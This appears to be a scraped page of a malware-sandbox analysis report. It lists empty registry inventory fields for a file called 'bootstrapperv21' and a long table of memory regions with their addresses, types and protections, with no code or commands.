\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
|
LowerCaseLongPath
|
||
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
|
LongPathHash
|
||
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
|
Name
|
||
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
|
OriginalFileName
|
||
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
|
Publisher
|
||
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
|
Version
|
||
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
|
BinFileVersion
|
||
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
|
BinaryType
|
||
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
|
ProductName
|
||
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
|
ProductVersion
|
||
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
|
LinkDate
|
||
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
|
BinProductVersion
|
||
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
|
AppxPackageFullName
|
||
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
|
AppxPackageRelativeId
|
||
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
|
Size
|
||
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
|
Language
|
||
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
|
Usn
|
There are 130 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
26A1000
|
trusted library allocation
|
page read and write
|
||
2AC9000
|
trusted library allocation
|
page read and write
|
||
1E9E40E4000
|
heap
|
page read and write
|
||
752000
|
unkown
|
page readonly
|
||
7FF848B13000
|
trusted library allocation
|
page execute and read and write
|
||
207DCB43000
|
heap
|
page read and write
|
||
53A2000
|
trusted library allocation
|
page read and write
|
||
207E0285000
|
heap
|
page read and write
|
||
C09000
|
heap
|
page read and write
|
||
CB0000
|
heap
|
page read and write
|
||
207DC5F0000
|
trusted library allocation
|
page read and write
|
||
1D99E7DB000
|
heap
|
page read and write
|
||
1D47DD46000
|
heap
|
page read and write
|
||
C4BF6FE000
|
stack
|
page read and write
|
||
207DDDA1000
|
heap
|
page read and write
|
||
207D0DDA000
|
heap
|
page read and write
|
||
1DA63140000
|
heap
|
page read and write
|
||
1AC8CBA0000
|
trusted library allocation
|
page read and write
|
||
207DCB89000
|
heap
|
page read and write
|
||
7FF848F10000
|
trusted library allocation
|
page read and write
|
||
1D99EF99000
|
heap
|
page read and write
|
||
1C468000
|
heap
|
page read and write
|
||
207DE247000
|
heap
|
page read and write
|
||
1D4655F0000
|
trusted library allocation
|
page read and write
|
||
1C1EC000
|
stack
|
page read and write
|
||
207DD5FB000
|
heap
|
page read and write
|
||
207D0C63000
|
heap
|
page read and write
|
||
1D465670000
|
heap
|
page read and write
|
||
20026149000
|
trusted library allocation
|
page read and write
|
||
201AAF60000
|
heap
|
page read and write
|
||
207D5C19000
|
heap
|
page read and write
|
||
207DD760000
|
unkown
|
page readonly
|
||
210D3B20000
|
heap
|
page read and write
|
||
1C972513000
|
heap
|
page read and write
|
||
207E0303000
|
heap
|
page read and write
|
||
2EF957E000
|
unkown
|
page readonly
|
||
222345FF000
|
heap
|
page read and write
|
||
1D99EA65000
|
heap
|
page read and write
|
||
D23D1FF000
|
stack
|
page read and write
|
||
207DE3E5000
|
heap
|
page read and write
|
||
C87000
|
heap
|
page read and write
|
||
207E022B000
|
heap
|
page read and write
|
||
14631280000
|
trusted library section
|
page readonly
|
||
2BF9D0A0000
|
trusted library allocation
|
page read and write
|
||
7FF848EF0000
|
trusted library allocation
|
page read and write
|
||
22236010000
|
heap
|
page read and write
|
||
22234682000
|
heap
|
page read and write
|
||
207DC7C0000
|
unkown
|
page readonly
|
||
1D99E8A9000
|
heap
|
page read and write
|
||
7FF848CB0000
|
trusted library allocation
|
page read and write
|
||
20035F41000
|
trusted library allocation
|
page read and write
|
||
7FF848BCC000
|
trusted library allocation
|
page execute and read and write
|
||
2EF947B000
|
stack
|
page read and write
|
||
207DDC20000
|
heap
|
page read and write
|
||
1DA74F2D000
|
trusted library allocation
|
page read and write
|
||
1D99EE84000
|
heap
|
page read and write
|
||
7FF848B3D000
|
trusted library allocation
|
page execute and read and write
|
||
204AA7E000
|
stack
|
page read and write
|
||
D142B7E000
|
stack
|
page read and write
|
||
7FF848CC2000
|
trusted library allocation
|
page read and write
|
||
BAB5FFE000
|
stack
|
page read and write
|
||
207D2ED0000
|
heap
|
page read and write
|
||
F7E9EE8000
|
stack
|
page read and write
|
||
7FF848D90000
|
trusted library allocation
|
page read and write
|
||
207DC670000
|
trusted library allocation
|
page read and write
|
||
1DA630B5000
|
heap
|
page read and write
|
||
1C843000
|
heap
|
page read and write
|
||
7FF848E59000
|
trusted library allocation
|
page read and write
|
||
207DE100000
|
heap
|
page read and write
|
||
D0799DE000
|
stack
|
page read and write
|
||
1DA65D45000
|
trusted library allocation
|
page read and write
|
||
201C5360000
|
heap
|
page read and write
|
||
524E000
|
trusted library allocation
|
page read and write
|
||
E50000
|
heap
|
page read and write
|
||
2BF9CE6C000
|
heap
|
page read and write
|
||
2BF9CE8D000
|
heap
|
page read and write
|
||
1C2F0000
|
heap
|
page read and write
|
||
247BDC00000
|
heap
|
page read and write
|
||
1E9E6454000
|
heap
|
page read and write
|
||
12D5000
|
heap
|
page read and write
|
||
7FF848B33000
|
trusted library allocation
|
page execute and read and write
|
||
1DA65CB6000
|
trusted library allocation
|
page read and write
|
||
1D99E8A9000
|
heap
|
page read and write
|
||
207D5D41000
|
heap
|
page read and write
|
||
1B4E3000
|
heap
|
page read and write
|
||
1D99EA58000
|
heap
|
page read and write
|
||
7FF848CD2000
|
trusted library allocation
|
page read and write
|
||
F7ECCFB000
|
stack
|
page read and write
|
||
20025FA1000
|
trusted library allocation
|
page read and write
|
||
207DDF80000
|
remote allocation
|
page read and write
|
||
1D99F0C6000
|
heap
|
page read and write
|
||
1D99EE41000
|
heap
|
page read and write
|
||
1C972516000
|
heap
|
page read and write
|
||
7FF848D80000
|
trusted library allocation
|
page read and write
|
||
7FF848DB0000
|
trusted library allocation
|
page read and write
|
||
247BD93C000
|
heap
|
page read and write
|
||
207DD4BE000
|
heap
|
page read and write
|
||
1D99E9A2000
|
heap
|
page read and write
|
||
7FF848B30000
|
trusted library allocation
|
page read and write
|
||
1D99E89F000
|
heap
|
page read and write
|
||
1DA65C26000
|
trusted library allocation
|
page read and write
|
||
2850000
|
trusted library allocation
|
page read and write
|
||
1E9E20B7000
|
heap
|
page read and write
|
||
207E0264000
|
heap
|
page read and write
|
||
207DCF7F000
|
heap
|
page read and write
|
||
201BCE0B000
|
trusted library allocation
|
page read and write
|
||
207E0423000
|
heap
|
page read and write
|
||
1C972533000
|
heap
|
page read and write
|
||
2BF9EB4C000
|
trusted library allocation
|
page read and write
|
||
1D99E85B000
|
heap
|
page read and write
|
||
1DA664D4000
|
trusted library allocation
|
page read and write
|
||
7FF848C50000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848CF4000
|
trusted library allocation
|
page read and write
|
||
1D47DD74000
|
heap
|
page read and write
|
||
7FF789DEB000
|
unkown
|
page readonly
|
||
1B765000
|
heap
|
page read and write
|
||
1C7EE000
|
stack
|
page read and write
|
||
1D99E7B0000
|
heap
|
page read and write
|
||
1D99F040000
|
heap
|
page read and write
|
||
1D99E7CC000
|
heap
|
page read and write
|
||
1D99E9F4000
|
heap
|
page read and write
|
||
BAF000
|
stack
|
page read and write
|
||
1ACA6C47000
|
heap
|
page read and write
|
||
207DCDE6000
|
unkown
|
page read and write
|
||
2A41000
|
trusted library allocation
|
page read and write
|
||
1E9E211E000
|
heap
|
page read and write
|
||
7FF848E54000
|
trusted library allocation
|
page read and write
|
||
7FF848CA2000
|
trusted library allocation
|
page read and write
|
||
51BB000
|
trusted library allocation
|
page read and write
|
||
1AC8CBE4000
|
heap
|
page read and write
|
||
1D475961000
|
trusted library allocation
|
page read and write
|
||
BAB58FE000
|
stack
|
page read and write
|
||
1AC9E571000
|
trusted library allocation
|
page read and write
|
||
1D99E8A9000
|
heap
|
page read and write
|
||
207DCC00000
|
trusted library allocation
|
page read and write
|
||
1020000
|
heap
|
page read and write
|
||
7FF6373F4000
|
unkown
|
page read and write
|
||
1D99EEDC000
|
heap
|
page read and write
|
||
D07A1FF000
|
stack
|
page read and write
|
||
981E10B000
|
stack
|
page read and write
|
||
201C4FA8000
|
heap
|
page read and write
|
||
1E9E20CD000
|
heap
|
page read and write
|
||
7FF848B33000
|
trusted library allocation
|
page read and write
|
||
7FF848E82000
|
trusted library allocation
|
page read and write
|
||
207E00CA000
|
heap
|
page read and write
|
||
1E9E63D2000
|
heap
|
page read and write
|
||
1D463CFD000
|
heap
|
page read and write
|
||
20026C98000
|
trusted library allocation
|
page read and write
|
||
20026E18000
|
trusted library allocation
|
page read and write
|
||
7FF848F4D000
|
trusted library allocation
|
page read and write
|
||
207DDC28000
|
heap
|
page read and write
|
||
F7EB7F9000
|
stack
|
page read and write
|
||
7FF848CE2000
|
trusted library allocation
|
page read and write
|
||
146312B0000
|
trusted library section
|
page readonly
|
||
2003E660000
|
heap
|
page read and write
|
||
7FF848B1D000
|
trusted library allocation
|
page execute and read and write
|
||
247BF44E000
|
trusted library allocation
|
page read and write
|
||
53DB000
|
trusted library allocation
|
page read and write
|
||
1E9E42B3000
|
heap
|
page read and write
|
||
1DA65672000
|
trusted library allocation
|
page read and write
|
||
1C0EB000
|
stack
|
page read and write
|
||
14630313000
|
heap
|
page read and write
|
||
21EFEFF000
|
stack
|
page read and write
|
||
207DC61A000
|
unkown
|
page readonly
|
||
207D0BA0000
|
heap
|
page read and write
|
||
D80000
|
heap
|
page read and write
|
||
1DA64BC0000
|
heap
|
page execute and read and write
|
||
1D99E897000
|
heap
|
page read and write
|
||
1D99E85B000
|
heap
|
page read and write
|
||
247D7DB9000
|
heap
|
page read and write
|
||
207DD660000
|
unkown
|
page readonly
|
||
22234601000
|
heap
|
page read and write
|
||
1C97252B000
|
heap
|
page read and write
|
||
207E00A4000
|
heap
|
page read and write
|
||
1C333000
|
heap
|
page read and write
|
||
7FF848B6C000
|
trusted library allocation
|
page execute and read and write
|
||
1D99EE52000
|
heap
|
page read and write
|
||
7FF848E60000
|
trusted library allocation
|
page read and write
|
||
247BF521000
|
trusted library allocation
|
page read and write
|
||
14630B00000
|
heap
|
page read and write
|
||
207DEC1C000
|
unkown
|
page write copy
|
||
207DEFDE000
|
heap
|
page read and write
|
||
207DC540000
|
trusted library allocation
|
page read and write
|
||
26A1000
|
trusted library allocation
|
page read and write
|
||
1AC8CA4B000
|
heap
|
page read and write
|
||
7FF848D10000
|
trusted library allocation
|
page read and write
|
||
1D99F002000
|
heap
|
page read and write
|
||
207DDD68000
|
heap
|
page read and write
|
||
1DA63240000
|
heap
|
page read and write
|
||
7FF848D20000
|
trusted library allocation
|
page read and write
|
||
BAB61FE000
|
stack
|
page read and write
|
||
1B7C0000
|
heap
|
page read and write
|
||
201ADE0B000
|
trusted library allocation
|
page read and write
|
||
F7EC2FC000
|
stack
|
page read and write
|
||
D079DFE000
|
stack
|
page read and write
|
||
F7EA9FA000
|
stack
|
page read and write
|
||
1D99EF77000
|
heap
|
page read and write
|
||
20025D10000
|
trusted library allocation
|
page read and write
|
||
1D99EE84000
|
heap
|
page read and write
|
||
AE0000
|
heap
|
page read and write
|
||
207E0041000
|
heap
|
page read and write
|
||
207DCABA000
|
heap
|
page read and write
|
||
201C4F50000
|
heap
|
page read and write
|
||
207DCCEC000
|
unkown
|
page readonly
|
||
207DCF67000
|
heap
|
page read and write
|
||
207DCAC8000
|
heap
|
page read and write
|
||
207DEF88000
|
heap
|
page read and write
|
||
1D99EEDD000
|
heap
|
page read and write
|
||
C75000
|
heap
|
page read and write
|
||
1E9E2201000
|
trusted library allocation
|
page read and write
|
||
C4BEDFF000
|
stack
|
page read and write
|
||
F7E99FE000
|
stack
|
page read and write
|
||
1AC8E89E000
|
trusted library allocation
|
page read and write
|
||
207DC622000
|
unkown
|
page readonly
|
||
2223472E000
|
heap
|
page read and write
|
||
7FF848BB6000
|
trusted library allocation
|
page read and write
|
||
990000
|
heap
|
page read and write
|
||
2EF857E000
|
unkown
|
page readonly
|
||
7FF848B23000
|
trusted library allocation
|
page execute and read and write
|
||
20024358000
|
heap
|
page read and write
|
||
207DEF88000
|
heap
|
page read and write
|
||
207DCCE0000
|
unkown
|
page readonly
|
||
1AC8E6E6000
|
trusted library allocation
|
page read and write
|
||
207E0065000
|
heap
|
page read and write
|
||
1D47DEFC000
|
heap
|
page read and write
|
||
1D99E89F000
|
heap
|
page read and write
|
||
1E9E4179000
|
heap
|
page read and write
|
||
207DEEA1000
|
heap
|
page read and write
|
||
14636000000
|
heap
|
page read and write
|
||
7FF848D30000
|
trusted library allocation
|
page read and write
|
||
E86000
|
heap
|
page read and write
|
||
207DEF42000
|
heap
|
page read and write
|
||
7FF848F80000
|
trusted library allocation
|
page read and write
|
||
201AAFF6000
|
heap
|
page read and write
|
||
207DEFA5000
|
heap
|
page read and write
|
||
201ACA30000
|
heap
|
page execute and read and write
|
||
207DEFD0000
|
heap
|
page read and write
|
||
7FF848B8C000
|
trusted library allocation
|
page execute and read and write
|
||
207E0233000
|
heap
|
page read and write
|
||
9B8000
|
heap
|
page read and write
|
||
247D7D4A000
|
heap
|
page read and write
|
||
1D99EE96000
|
heap
|
page read and write
|
||
1D4669A5000
|
trusted library allocation
|
page read and write
|
||
207DD4E7000
|
heap
|
page read and write
|
||
9CA974E000
|
stack
|
page read and write
|
||
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
7FF848CA1000
|
trusted library allocation
|
page read and write
|
||
4F44AFF000
|
stack
|
page read and write
|
||
207DA990000
|
trusted library allocation
|
page read and write
|
||
204A876000
|
stack
|
page read and write
|
||
1D99E862000
|
heap
|
page read and write
|
||
207DCF90000
|
heap
|
page read and write
|
||
207DCF00000
|
heap
|
page read and write
|
||
207DEF84000
|
heap
|
page read and write
|
||
207DDDAC000
|
heap
|
page read and write
|
||
E48000
|
heap
|
page read and write
|
||
1AC8E5DE000
|
trusted library allocation
|
page read and write
|
||
7FF637391000
|
unkown
|
page execute read
|
||
14630A15000
|
heap
|
page read and write
|
||
207D31F5000
|
heap
|
page read and write
|
||
103F000
|
stack
|
page read and write
|
||
2EF89FE000
|
stack
|
page read and write
|
||
1B6DF000
|
stack
|
page read and write
|
||
1D99F024000
|
heap
|
page read and write
|
||
7FF848B40000
|
trusted library allocation
|
page read and write
|
||
11E0000
|
heap
|
page read and write
|
||
1D99E9F4000
|
heap
|
page read and write
|
||
207D0DCD000
|
heap
|
page read and write
|
||
7FF6373FE000
|
unkown
|
page readonly
|
||
207DEE90000
|
heap
|
page read and write
|
||
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
A18000
|
heap
|
page read and write
|
||
7FF848EFC000
|
trusted library allocation
|
page read and write
|
||
1AC8CA20000
|
heap
|
page read and write
|
||
207DD4DF000
|
heap
|
page read and write
|
||
207D9EB0000
|
trusted library allocation
|
page read and write
|
||
1D99F024000
|
heap
|
page read and write
|
||
7FF848B02000
|
trusted library allocation
|
page read and write
|
||
1D47DFA6000
|
heap
|
page read and write
|
||
1AC8E622000
|
trusted library allocation
|
page read and write
|
||
7FF848B0D000
|
trusted library allocation
|
page execute and read and write
|
||
1DA74C95000
|
trusted library allocation
|
page read and write
|
||
7FF848B14000
|
trusted library allocation
|
page read and write
|
||
207DE0CF000
|
heap
|
page read and write
|
||
1D99F0FB000
|
heap
|
page read and write
|
||
1E9E20CD000
|
heap
|
page read and write
|
||
247BF54D000
|
trusted library allocation
|
page read and write
|
||
1AFD0000
|
heap
|
page execute and read and write
|
||
1D99EEBA000
|
heap
|
page read and write
|
||
207DD7F8000
|
unkown
|
page readonly
|
||
207DC6D1000
|
trusted library allocation
|
page read and write
|
||
7FF848B4D000
|
trusted library allocation
|
page execute and read and write
|
||
B75000
|
heap
|
page read and write
|
||
7FF848D50000
|
trusted library allocation
|
page read and write
|
||
1AC8CB90000
|
trusted library allocation
|
page read and write
|
||
207DC34B000
|
trusted library allocation
|
page read and write
|
||
5B6E4B6000
|
stack
|
page read and write
|
||
201AC930000
|
trusted library allocation
|
page read and write
|
||
207DD760000
|
trusted library allocation
|
page read and write
|
||
1D99E89B000
|
heap
|
page read and write
|
||
7FF848E53000
|
trusted library allocation
|
page read and write
|
||
F40000
|
heap
|
page read and write
|
||
207D5C83000
|
heap
|
page read and write
|
||
7FF848F80000
|
trusted library allocation
|
page read and write
|
||
2580000
|
heap
|
page read and write
|
||
207DE349000
|
heap
|
page read and write
|
||
207E009A000
|
heap
|
page read and write
|
||
1C280000
|
heap
|
page read and write
|
||
1D99EA6D000
|
heap
|
page read and write
|
||
7FF848B4C000
|
trusted library allocation
|
page execute and read and write
|
||
1C2FD000
|
heap
|
page read and write
|
||
7FF848F40000
|
trusted library allocation
|
page execute and read and write
|
||
222345EB000
|
heap
|
page read and write
|
||
1D99F060000
|
heap
|
page read and write
|
||
F20000
|
heap
|
page read and write
|
||
1E9E2170000
|
heap
|
page read and write
|
||
D38000
|
heap
|
page read and write
|
||
1D4668E1000
|
trusted library allocation
|
page read and write
|
||
204A57F000
|
stack
|
page read and write
|
||
7FF848B1D000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848DE0000
|
trusted library allocation
|
page read and write
|
||
F7E9BFF000
|
stack
|
page read and write
|
||
207DE679000
|
heap
|
page read and write
|
||
F7EBEFC000
|
stack
|
page read and write
|
||
7FF848CD0000
|
trusted library allocation
|
page read and write
|
||
7FF848B10000
|
trusted library allocation
|
page read and write
|
||
14630290000
|
heap
|
page read and write
|
||
1463582C000
|
heap
|
page read and write
|
||
D079D79000
|
stack
|
page read and write
|
||
1E9E2131000
|
heap
|
page read and write
|
||
1B33D000
|
stack
|
page read and write
|
||
1C417000
|
heap
|
page read and write
|
||
207DCCAE000
|
unkown
|
page write copy
|
||
1C974200000
|
heap
|
page read and write
|
||
7FF6373FE000
|
unkown
|
page write copy
|
||
1D99E7CA000
|
heap
|
page read and write
|
||
7FF848CC0000
|
trusted library allocation
|
page execute and read and write
|
||
1E9E2260000
|
heap
|
page read and write
|
||
1D99EF10000
|
heap
|
page read and write
|
||
269F000
|
trusted library allocation
|
page read and write
|
||
1E14B000
|
stack
|
page read and write
|
||
12DB3000
|
trusted library allocation
|
page read and write
|
||
1D99E82D000
|
heap
|
page read and write
|
||
21EFFFB000
|
stack
|
page read and write
|
||
1E9E20FB000
|
heap
|
page read and write
|
||
22234681000
|
heap
|
page read and write
|
||
201C4F60000
|
heap
|
page read and write
|
||
2BFB7350000
|
heap
|
page read and write
|
||
201AE8DF000
|
trusted library allocation
|
page read and write
|
||
146356E0000
|
trusted library allocation
|
page read and write
|
||
247BF4BA000
|
trusted library allocation
|
page read and write
|
||
146358C1000
|
heap
|
page read and write
|
||
1B0DE000
|
stack
|
page read and write
|
||
5310000
|
trusted library allocation
|
page read and write
|
||
1D99EE52000
|
heap
|
page read and write
|
||
7FF848E52000
|
trusted library allocation
|
page read and write
|
||
207DDDFB000
|
heap
|
page read and write
|
||
F7EBAFB000
|
stack
|
page read and write
|
||
1D99E9A3000
|
heap
|
page read and write
|
||
1D99E8A9000
|
heap
|
page read and write
|
||
5B6F309000
|
stack
|
page read and write
|
||
7FF848B5C000
|
trusted library allocation
|
page execute and read and write
|
||
22234470000
|
heap
|
page read and write
|
||
207E00C7000
|
heap
|
page read and write
|
||
7FF848BA0000
|
trusted library allocation
|
page read and write
|
||
247BF4AB000
|
trusted library allocation
|
page read and write
|
||
1D99EA58000
|
heap
|
page read and write
|
||
146356F0000
|
trusted library allocation
|
page read and write
|
||
207DE71F000
|
heap
|
page read and write
|
||
2CAE000
|
stack
|
page read and write
|
||
1D99EA47000
|
heap
|
page read and write
|
||
207DEE47000
|
heap
|
page read and write
|
||
207DDD57000
|
heap
|
page read and write
|
||
247BD8EE000
|
heap
|
page read and write
|
||
200276A7000
|
trusted library allocation
|
page read and write
|
||
1D99E7E6000
|
heap
|
page read and write
|
||
201C5024000
|
heap
|
page read and write
|
||
207D0D9B000
|
heap
|
page read and write
|
||
7FF848D00000
|
trusted library allocation
|
page read and write
|
||
20035F21000
|
trusted library allocation
|
page read and write
|
||
7FF848B13000
|
trusted library allocation
|
page execute and read and write
|
||
BAC000
|
heap
|
page read and write
|
||
CD8000
|
heap
|
page read and write
|
||
207DE613000
|
heap
|
page read and write
|
||
4F4563E000
|
stack
|
page read and write
|
||
207DCD00000
|
trusted library allocation
|
page read and write
|
||
F7ECEFC000
|
stack
|
page read and write
|
||
201AE929000
|
trusted library allocation
|
page read and write
|
||
200270D3000
|
trusted library allocation
|
page read and write
|
||
C8F000
|
heap
|
page read and write
|
||
1DA65826000
|
trusted library allocation
|
page read and write
|
||
1ACA6C49000
|
heap
|
page read and write
|
||
D07A0F8000
|
stack
|
page read and write
|
||
201AB130000
|
trusted library allocation
|
page read and write
|
||
7FF848BB0000
|
trusted library allocation
|
page read and write
|
||
20024350000
|
heap
|
page read and write
|
||
7FF848BCC000
|
trusted library allocation
|
page execute and read and write
|
||
D07999E000
|
stack
|
page read and write
|
||
207DCAA8000
|
heap
|
page read and write
|
||
1E9E5F43000
|
heap
|
page read and write
|
||
1D99EA28000
|
heap
|
page read and write
|
||
1D99E7F5000
|
heap
|
page read and write
|
||
7FF848E68000
|
trusted library allocation
|
page read and write
|
||
7FF848CE8000
|
trusted library allocation
|
page read and write
|
||
4F44DFD000
|
stack
|
page read and write
|
||
7FF848D60000
|
trusted library allocation
|
page read and write
|
||
7FF848D50000
|
trusted library allocation
|
page read and write
|
||
207D317B000
|
heap
|
page read and write
|
||
5B6E3F9000
|
stack
|
page read and write
|
||
1C97251E000
|
heap
|
page read and write
|
||
207DC600000
|
trusted library allocation
|
page read and write
|
||
1D99EA58000
|
heap
|
page read and write
|
||
1DA74C30000
|
trusted library allocation
|
page read and write
|
||
247BF51D000
|
trusted library allocation
|
page read and write
|
||
4F44EFE000
|
stack
|
page read and write
|
||
1D99EEEC000
|
heap
|
page read and write
|
||
207D0CC0000
|
heap
|
page read and write
|
||
7FF848DD0000
|
trusted library allocation
|
page read and write
|
||
7FF848CD0000
|
trusted library allocation
|
page read and write
|
||
1D4666B5000
|
trusted library allocation
|
page read and write
|
||
1DA66A45000
|
trusted library allocation
|
page read and write
|
||
D07AD4E000
|
stack
|
page read and write
|
||
1BECC000
|
stack
|
page read and write
|
||
1D465630000
|
trusted library allocation
|
page read and write
|
||
48C9000
|
trusted library allocation
|
page read and write
|
||
59608FC000
|
stack
|
page read and write
|
||
207DCB2F000
|
heap
|
page read and write
|
||
1D465674000
|
heap
|
page read and write
|
||
A1F000
|
heap
|
page read and write
|
||
207E0066000
|
heap
|
page read and write
|
||
207DE35F000
|
heap
|
page read and write
|
||
1E9E6455000
|
heap
|
page read and write
|
||
7FF848DA0000
|
trusted library allocation
|
page read and write
|
||
7FF848B23000
|
trusted library allocation
|
page read and write
|
||
BAB64FE000
|
stack
|
page read and write
|
||
1D99F024000
|
heap
|
page read and write
|
||
207D0D72000
|
heap
|
page read and write
|
||
210D3E14000
|
heap
|
page read and write
|
||
9B0000
|
heap
|
page read and write
|
||
7DF4A2060000
|
trusted library allocation
|
page execute and read and write
|
||
207DDC00000
|
heap
|
page read and write
|
||
7FF848CB0000
|
trusted library allocation
|
page execute and read and write
|
||
247D7DC1000
|
heap
|
page read and write
|
||
7FF848B3D000
|
trusted library allocation
|
page execute and read and write
|
||
207DC6A2000
|
unkown
|
page read and write
|
||
1C972516000
|
heap
|
page read and write
|
||
1D99E860000
|
heap
|
page read and write
|
||
207DE0F5000
|
heap
|
page read and write
|
||
26AC000
|
trusted library allocation
|
page read and write
|
||
1D465910000
|
trusted library allocation
|
page read and write
|
||
D07ADCD000
|
stack
|
page read and write
|
||
D23D0FD000
|
stack
|
page read and write
|
||
1AC8CB80000
|
heap
|
page read and write
|
||
1DA65DFC000
|
trusted library allocation
|
page read and write
|
||
1DA7D20D000
|
heap
|
page read and write
|
||
1D463CF9000
|
heap
|
page read and write
|
||
2EF827C000
|
stack
|
page read and write
|
||
207D57D1000
|
trusted library allocation
|
page read and write
|
||
1D47DFAD000
|
heap
|
page read and write
|
||
7FF848CD1000
|
trusted library allocation
|
page read and write
|
||
207DCF46000
|
heap
|
page read and write
|
||
207DE2E4000
|
heap
|
page read and write
|
||
247BF519000
|
trusted library allocation
|
page read and write
|
||
B60000
|
heap
|
page execute and read and write
|
||
207DD4E1000
|
heap
|
page read and write
|
||
4F44FFE000
|
stack
|
page read and write
|
||
14630860000
|
trusted library allocation
|
page read and write
|
||
22237EA0000
|
heap
|
page read and write
|
||
207DE24A000
|
heap
|
page read and write
|
||
9CA8D7B000
|
stack
|
page read and write
|
||
2BF9D224000
|
heap
|
page read and write
|
||
1D47DDA0000
|
heap
|
page read and write
|
||
1D47DF81000
|
heap
|
page read and write
|
||
1DA74C41000
|
trusted library allocation
|
page read and write
|
||
1D99F092000
|
heap
|
page read and write
|
||
1B77E000
|
stack
|
page read and write
|
||
207DCFDB000
|
heap
|
page read and write
|
||
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
1DA65F29000
|
trusted library allocation
|
page read and write
|
||
1D99E9C2000
|
heap
|
page read and write
|
||
247BF53D000
|
trusted library allocation
|
page read and write
|
||
14630970000
|
trusted library section
|
page read and write
|
||
7FF848C20000
|
trusted library allocation
|
page execute and read and write
|
||
1D475C4C000
|
trusted library allocation
|
page read and write
|
||
207DD790000
|
trusted library allocation
|
page read and write
|
||
1DA630BA000
|
heap
|
page read and write
|
||
1D99E872000
|
heap
|
page read and write
|
||
207DEE36000
|
heap
|
page read and write
|
||
7FF848D80000
|
trusted library allocation
|
page read and write
|
||
1D99EA6D000
|
heap
|
page read and write
|
||
C7F000
|
stack
|
page read and write
|
||
1D99E8A9000
|
heap
|
page read and write
|
||
7FF848CB0000
|
trusted library allocation
|
page read and write
|
||
207DC740000
|
trusted library allocation
|
page read and write
|
||
7FF848F10000
|
trusted library allocation
|
page read and write
|
||
207D5E90000
|
trusted library allocation
|
page read and write
|
||
7DF4914A0000
|
trusted library allocation
|
page execute and read and write
|
||
207DD548000
|
heap
|
page read and write
|
||
201AAFFE000
|
heap
|
page read and write
|
||
201AAF40000
|
heap
|
page read and write
|
||
247D7DB3000
|
heap
|
page read and write
|
||
C50000
|
heap
|
page read and write
|
||
AF1000
|
stack
|
page read and write
|
||
1C972450000
|
heap
|
page read and write
|
||
2BF9CE40000
|
heap
|
page read and write
|
||
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
1D47DFBD000
|
heap
|
page read and write
|
||
1DA7D380000
|
heap
|
page read and write
|
||
207DE389000
|
heap
|
page read and write
|
||
1DA7D0B7000
|
heap
|
page read and write
|
||
7FF848B2D000
|
trusted library allocation
|
page execute and read and write
|
||
2BF9CE8B000
|
heap
|
page read and write
|
||
207E02C4000
|
heap
|
page read and write
|
||
207D0DF3000
|
heap
|
page read and write
|
||
981E8FD000
|
stack
|
page read and write
|
||
7FF848D02000
|
trusted library allocation
|
page read and write
|
||
7DF4A2040000
|
trusted library allocation
|
page execute and read and write
|
||
1D463D3A000
|
heap
|
page read and write
|
||
20027236000
|
trusted library allocation
|
page read and write
|
||
1D99E89F000
|
heap
|
page read and write
|
||
207DCE00000
|
heap
|
page read and write
|
||
1BFD0000
|
trusted library allocation
|
page read and write
|
||
1AECD000
|
stack
|
page read and write
|
||
1B28D000
|
stack
|
page read and write
|
||
12A45000
|
trusted library allocation
|
page read and write
|
||
207D5DF4000
|
heap
|
page read and write
|
||
207D0CC9000
|
heap
|
page read and write
|
||
2003E7DC000
|
heap
|
page read and write
|
||
1B710000
|
heap
|
page execute and read and write
|
||
FB0000
|
heap
|
page read and write
|
||
7FF848BF6000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848B41000
|
trusted library allocation
|
page read and write
|
||
207DD5AA000
|
heap
|
page read and write
|
||
7FF848C90000
|
trusted library allocation
|
page read and write
|
||
1D4669D8000
|
trusted library allocation
|
